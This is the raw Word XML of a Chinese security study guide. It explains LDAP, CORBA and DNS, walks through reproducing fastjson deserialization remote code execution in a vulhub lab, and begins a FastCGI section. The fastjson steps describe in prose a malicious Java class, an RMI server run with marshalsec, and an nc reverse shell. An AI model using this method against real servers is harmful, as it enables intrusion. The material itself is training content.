        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>LDAP(轻量级目录访问协议)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32844A9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是一种目录服务协议，用于访问分布式目录信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F1F96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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CORBA(公共对象请求代理体系结构)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB79F5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是一种标准体系结构，用于实现对象请求代理（ORB），以使不同的计算机系统上的对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E29C4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象能够相互操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890FA79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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>DNS(域名服务)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5C8C6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将域名和IP地址相互映射的服务，以便用户更易于记忆和使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1654457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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fastjson &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 1.2.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F90772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漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F82DF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14142675" wp14:editId="64141A03">
            <wp:extent cx="5975350" cy="1149985"/>
            <wp:effectExtent l="0" t="0" r="13970" b="8255"/>
            <wp:docPr id="13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图片 9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:srcRect t="7030" b="3317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726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需准备三台主机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>这里主机B和C都用PCKail2023这台虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E185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主机A：存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>反序列化漏洞的主机（受害主机）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A86E3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主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：为构造的恶意类（包含要执行的命令），开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898044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主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RMI/LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">服务 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8CD4B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 xml:space="preserve">在整个远程命令执行流程： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1018844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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、黑客使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rmi/ldap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">地址） </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1796421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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>引发反序列化漏洞，发送了进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>远程方法调用，去连接主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72916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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务指定加载主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类，所以主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1841BBF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最终加载并执行主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD5DE8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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>引发恶意系统命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5F5E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来到受害主机A复现漏洞：使用vulhub靶场，启动fastjson对应漏洞的容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7735C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sz w:val="24"/>
        </w:rPr>
        <w:t>然后访问一下受害主机的网站：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://192.168.1.9:8090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456AFC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来到黑客主机PCKail2023搭建环境：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>开启nginx服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1CCF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1、进入站点根目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3640121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2、构造一个Java类(先删除之前创建的演示文件rce.xml)类名叫做TouchFile.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303D73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3、编译此Java类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5563923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4、然后借助marshalsec工具启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器，监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE691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5、制定加载远程类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TouchFile.class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，后面要触发目标服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器来下载恶意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4043121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的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TouchFile.class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>到目标服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818E72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6、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>marshalsec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>工具执行指令开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E696A6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7、开始抓包向靶场服务器发送Payload，并带上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2324E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8、再次查看容器内的tmp目录，看见success目录创建成功，漏洞复现成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C13C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9、还可以通过nc来完成反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>动作，可以自行尝试一下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E986B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 xml:space="preserve">6.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>fastjson 1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>47远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A41BF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漏洞原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9266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fastjson于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.2.24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本后增加了反序列化白名单，而在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.2.48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以前的版本中，攻击者可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D364C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利用特殊构造的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串绕过白名单检测，成功执行任意命令。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF2AC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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fastjson &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9A689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漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076681C2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过程与fastjson 1.2.24 反序列化任意命令执行一样，仅最后一步发送的payload数据包不</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C947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sz w:val="24"/>
        </w:rPr>
        <w:t>一样，其它全部一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662980C6" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0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2" w:name="_Toc10589"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>七、Fastcgi协议功能模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞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（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>面试常问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）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="613E09B4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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7236D82D" wp14:editId="3D10368D">
            <wp:extent cx="6470650" cy="1851025"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="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7286B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CGI（公共网关接口）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A6452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CGI是一种协议，它定义了Nginx或者其他Web Server传递过来的数据格式，全称是（Common </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B87A9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Gateway Interface，CGI），CGI是一个独立的程序，独立与WebServer之外，任何语言都可以写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43788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CGI程序，例如C、Perl、Python等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29748B92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FastCGI：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B2B6A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FastCGI是一种协议，前身是CGI，是优化版的CGI，拥有5倍以上的稳定性和性能提升。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D775E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PHP-CGI：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B946B6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这是PHP（一种Web应用程序开发语言）与Web服务器之间的接口程序，它实现了PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DA8DB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通过CGI协议与服务器之间的交互，本身只能解析请求，返回结果，不会做进程管理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C2211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PHP-FPM（FastCGI Process Manager）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633A592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这是PHP另一种与Web服务器交互的接口程序，它不仅实现了PHP通过FastCGI 协议与服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066378C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器通信，还提供了更为智能的进程管理功能，以优化性能和资源管理。</w:t>
      </w:r>
    </w:p>
